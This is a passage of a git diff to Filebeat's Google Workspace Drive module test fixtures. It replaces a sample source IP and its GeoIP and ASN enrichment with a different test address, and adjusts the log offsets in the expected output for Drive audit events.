title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"download","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"edit","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"add_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"move","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"preview","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"print","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"remove_from_folder","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"rename","parameters":[{"name":"billable","boolValue":true},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"bar.gif"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_value","value":"foo.gif","new_value":"bar.gif"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"untrash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"sheets_import_range","parameters":[{"name":"sheets_import_range_recipient_doc","value":"1234"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"trash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"remove_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document 
title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"upload","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"view","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"shared_drive_id","value":"1234"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_acl_editors","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_document_access_scope","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_document_visibility","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"shared_drive_membership_change","parameters":[{"name":"added_role","value":"editor"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"removed_role","value":"content_manager"},{"name":"membership_change_type","value":"add_to_shared_drive"},{"name":"target","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"shared_drive_settings_change","parameters":[{"name":"new_settings_state","value":"restricted"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_settings_state","value":"unrestricted"},{"name":"shared_drive_settings_change_type","value":"direct_acl"},{"name":"target","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"sheets_import_range_access_change","parameters":[{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"sheets_import_range_recipient_doc","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_user_access","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"can_comment"},{"name":"old_value","value":"can_view"},{"name":"old_visibility","value":"people_with_link"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"target_user","value":"user@example.com"},{"name":"visibility","value":"private"},{"name":"visibility_change","value":"external"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json
index 74b7811f7b54..bb78f8b06ad8 100644
--- a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json
@@ -8,7 +8,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -35,24 +35,20 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -75,7 +71,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -97,27 +93,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 816,
+ "log.offset": 815,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -140,7 +132,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -162,27 +154,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1529,
+ "log.offset": 1527,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -205,7 +193,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -227,27 +215,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2247,
+ "log.offset": 2244,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -270,7 +254,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
